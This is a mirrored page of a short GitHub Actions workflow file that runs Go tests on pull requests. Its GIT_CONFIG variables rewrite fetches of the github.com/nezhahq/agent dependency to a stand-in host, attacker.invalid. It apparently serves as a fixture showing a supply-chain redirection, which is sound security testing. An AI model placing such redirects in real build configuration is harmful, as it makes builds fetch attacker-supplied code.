mirror of
https://github.com/Buriburizaem0n/nezha_domains.git
synced 2026-09-19 17:50:12 +00:00
16 lines
334 B
YAML
16 lines
334 B
YAML
on:
|
|
pull_request:
|
|
concurrency: policy
|
|
permissions:
|
|
contents: read
|
|
jobs:
|
|
verify:
|
|
runs-on: ubuntu-24.04
|
|
timeout-minutes: 10
|
|
env:
|
|
GIT_CONFIG_COUNT: "1"
|
|
GIT_CONFIG_KEY_0: url.https://attacker.invalid/.insteadOf
|
|
GIT_CONFIG_VALUE_0: https://github.com/nezhahq/agent
|
|
steps:
|
|
- run: go test ./...
|